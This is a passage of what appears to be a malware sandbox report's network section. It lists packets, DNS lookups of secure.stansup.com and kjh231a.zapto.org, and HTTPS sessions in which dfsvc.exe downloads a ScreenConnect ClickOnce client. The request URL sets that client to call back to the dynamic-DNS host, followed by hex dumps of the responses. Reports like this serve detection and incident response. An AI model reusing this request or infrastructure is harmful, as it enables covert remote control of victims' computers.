                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.797318935 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.797365904 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802330017 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802381992 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802422047 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802428007 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802468061 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803708076 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803755999 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803792953 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803797960 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803833008 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803864956 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804776907 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804821014 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804853916 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804860115 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804903030 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.889976978 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890011072 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890091896 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890126944 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890141964 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.891968966 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892014027 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892040968 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892103910 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892112017 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.894449949 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908634901 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908654928 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908746004 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908757925 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908785105 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908807039 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009111881 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009169102 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009244919 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009259939 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009293079 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009315014 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009943962 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010005951 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010018110 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010026932 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010050058 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010123014 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012389898 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012403011 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012417078 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012459993 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.485327005 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.490930080 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.490993977 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.310394049 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.315895081 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.549129963 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.570194960 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.575632095 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.812694073 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.866961002 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.337471962 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.343702078 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.344057083 CEST499448041192.168.2.1179.110.49.185

                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.303411961 CEST5625753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.464466095 CEST53562571.1.1.1192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.444528103 CEST6276553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.452666044 CEST53627651.1.1.1192.168.2.11

                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.303411961 CEST192.168.2.111.1.1.10x9de8Standard query (0)secure.stansup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.444528103 CEST192.168.2.111.1.1.10x53d5Standard query (0)kjh231a.zapto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:14.956476927 CEST1.1.1.1192.168.2.110x39fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:14.956476927 CEST1.1.1.1192.168.2.110x39fNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:14.956476927 CEST1.1.1.1192.168.2.110x39fNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:21.464466095 CEST1.1.1.1192.168.2.110x9de8No error (0)secure.stansup.com79.110.49.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:23.269968033 CEST1.1.1.1192.168.2.110x4ddeNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:23.269968033 CEST1.1.1.1192.168.2.110x4ddeNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:25.673940897 CEST1.1.1.1192.168.2.110xd30fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:25.673940897 CEST1.1.1.1192.168.2.110xd30fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:28.080862999 CEST1.1.1.1192.168.2.110x9c59No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:28.080862999 CEST1.1.1.1192.168.2.110x9c59No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.510679007 CEST1.1.1.1192.168.2.110x6401No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.510679007 CEST1.1.1.1192.168.2.110x6401No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.452666044 CEST1.1.1.1192.168.2.110x53d5No error (0)kjh231a.zapto.org79.110.49.185A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                        • secure.stansup.com

                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.114972779.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:22 UTC630OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:22 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 118229
                                                                                                                                                                                                                                                        Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:21 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:22 UTC16134INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                        2024-10-25 17:27:22 UTC16384INData Raw: 38 6b 4a 65 66 2f 65 72 76 39 41 49 70 57 49 67 4b 51 6e 49 38 43 47 2f 69 6e 41 69 68 4f 72 67 4b 35 33 74 41 44 34 6d 31 44 42 50 74 30 44 67 58 49 7a 54 67 46 2f 38 37 58 42 54 6c 30 6f 77 5a 34 4d 74 73 47 4a 35 4d 43 43 4b 68 4f 6e 51 69 57 6f 4f 51 49 75 46 34 44 43 55 70 7a 4a 41 6e 59 54 56 4d 4a 59 33 49 57 43 32 45 66 6e 67 77 71 57 79 4d 4e 72 6f 68 4e 44 76 56 58 56 41 35 53 5a 4a 6f 4f 4d 77 4f 39 44 74 4d 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33
                                                                                                                                                                                                                                                        Data Ascii: 8kJef/erv9AIpWIgKQnI8CG/inAihOrgK53tAD4m1DBPt0DgXIzTgF/87XBTl0owZ4MtsGJ5MCCKhOnQiWoOQIuF4DCUpzJAnYTVMJY3IWC2EfngwqWyMNrohNDvVXVA5SZJoOMwO9DtMbgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC16384INData Raw: 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 4d 4e 41 41 42 49 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 5a 51 42 47 41 47 38 41 62 41 42 6b 41 47 55 41 63 67 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 43 77 30 41 41 46 42 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41
                                                                                                                                                                                                                                                        Data Ascii: BlAHIAVABpAHQAbABlAAMNAABIQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwBhAHAAdAB1AHIAZQBGAG8AbABkAGUAcgBUAGkAdABsAGUACw0AAFBDAG8AbgB0AHIAbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByA
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC16384INData Raw: 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 4d 41 62 77 42 75 41 47 59 41 61 51 42 6e 41 48 55 41 63 67 42 6c 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 6b 4c 51 41 41 62 6b 30 41 59 51 42 6a 41 45 63 41 63 67 42 68 41 47 34 41 64 41 42 42 41 47 4d 41 59 77 42 6c 41 48 4d 41 63 77 42 70 41 47 49 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41
                                                                                                                                                                                                                                                        Data Ascii: QAaQBhAGwAbwBnAEMAbwBuAGYAaQBnAHUAcgBlAFAAZQByAG0AaQBzAHMAaQBvAG4AQgB1AHQAdABvAG4AVABlAHgAdABkLQAAbk0AYQBjAEcAcgBhAG4AdABBAGMAYwBlAHMAcwBpAGIAaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NA
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC16384INData Raw: 39 32 61 57 52 6c 63 67 46 65 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 30 62 32 39 73 49 48 56 7a 5a 57 51 67 64 47 38 67 63 32 56 73 5a 57 4e 30 49 47 45 67 63 6d 56 6e 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 67 5a 6d 39 79 49 47 39 77 64 47 6c 6a 59 57 77 67 59 32 68 68 63 6d 46 6a 64 47 56 79 49 48 4a 6c 59 32 39 6e 62 6d 6c 30 61 57 39 75 49 43 68 50 51 31 49 70 4c 67 45 4c 55 32 56 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49
                                                                                                                                                                                                                                                        Data Ascii: 92aWRlcgFeQ2hvb3NlIHRoZSB0b29sIHVzZWQgdG8gc2VsZWN0IGEgcmVnaW9uIG9mIHRoZSBzY3JlZW4gZm9yIG9wdGljYWwgY2hhcmFjdGVyIHJlY29nbml0aW9uIChPQ1IpLgELU2VsZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uI
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC16384INData Raw: 4f 76 65 72 72 69 64 65 2e 65 6e 2d 55 53 2e 72 65 73 6f 75 72 63 65 73 2d 2d 3e 3c 21 2d 2d 7a 73 72 76 76 67 45 41 41 41 43 52 41 41 41 41 62 46 4e 35 63 33 52 6c 62 53 35 53 5a 58 4e 76 64 58 4a 6a 5a 58 4d 75 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 46 6b 5a 58 49 73 49 47 31 7a 59 32 39 79 62 47 6c 69 4c 43 42 57 5a 58 4a 7a 61 57 39 75 50 54 51 75 4d 43 34 77 4c 6a 41 73 49 45 4e 31 62 48 52 31 63 6d 55 39 62 6d 56 31 64 48 4a 68 62 43 77 67 55 48 56 69 62 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                        Data Ascii: Override.en-US.resources-->...zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAA
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC16384INData Raw: 73 37 54 2f 44 67 45 48 4a 4c 4d 55 4f 73 70 39 48 48 38 6e 78 77 44 41 31 57 34 53 63 76 6c 62 37 54 56 77 55 71 59 45 58 6b 48 41 49 58 6d 7a 46 6e 6b 6a 31 6d 32 79 44 41 42 45 6f 64 39 71 70 6f 48 62 70 55 72 67 42 67 4b 57 63 67 30 63 34 7a 36 4f 62 38 6b 7a 41 42 43 46 66 6e 39 6a 37 50 2b 58 64 69 69 42 34 78 56 77 35 6d 33 67 2b 50 5a 78 50 43 66 52 41 4d 44 2f 6b 76 61 6b 75 75 47 6a 39 39 2b 36 6b 56 41 43 78 79 76 67 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41
                                                                                                                                                                                                                                                        Data Ascii: s7T/DgEHJLMUOsp9HH8nxwDA1W4Scvlb7TVwUqYEXkHAIXmzFnkj1m2yDABEod9qpoHbpUrgBgKWcg0c4z6Ob8kzABCFfn9j7P+XdiiB4xVw5m3g+PZxPCfRAMD/kvakuuGj99+6kVACxyvgbXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsA
                                                                                                                                                                                                                                                        2024-10-25 17:27:23 UTC3791INData Raw: 62 63 41 41 43 4f 42 36 74 69 49 74 61 41 4d 47 51 41 44 6e 6e 38 59 78 68 6d 33 41 54 78 78 52 41 41 48 73 43 6e 79 33 31 56 37 2b 7a 6d 73 44 42 6b 41 41 35 37 6f 43 32 77 59 4d 67 41 41 65 77 7a 53 4f 56 46 6f 75 39 67 4a 34 58 78 63 53 41 41 49 34 31 30 44 4b 70 66 67 32 34 4b 64 4f 4b 49 41 41 31 6f 71 55 6d 4d 61 78 33 77 76 67 78 61 67 41 66 75 47 45 41 67 68 67 74 69 77 6a 42 45 41 41 31 2b 34 4b 50 4e 38 4c 34 4e 57 6f 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58
                                                                                                                                                                                                                                                        Data Ascii: bcAACOB6tiItaAMGQADnn8Yxhm3ATxxRAAHsCny31V7+zmsDBkAA57oC2wYMgAAewzSOVFou9gJ4XxcSAAI410DKpfg24KdOKIAA1oqUmMax3wvgxagAfuGEAghgtiwjBEAA1+4KPN8L4NWoAH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEX


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.114974979.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC100OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 17858
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:24 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC16169INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
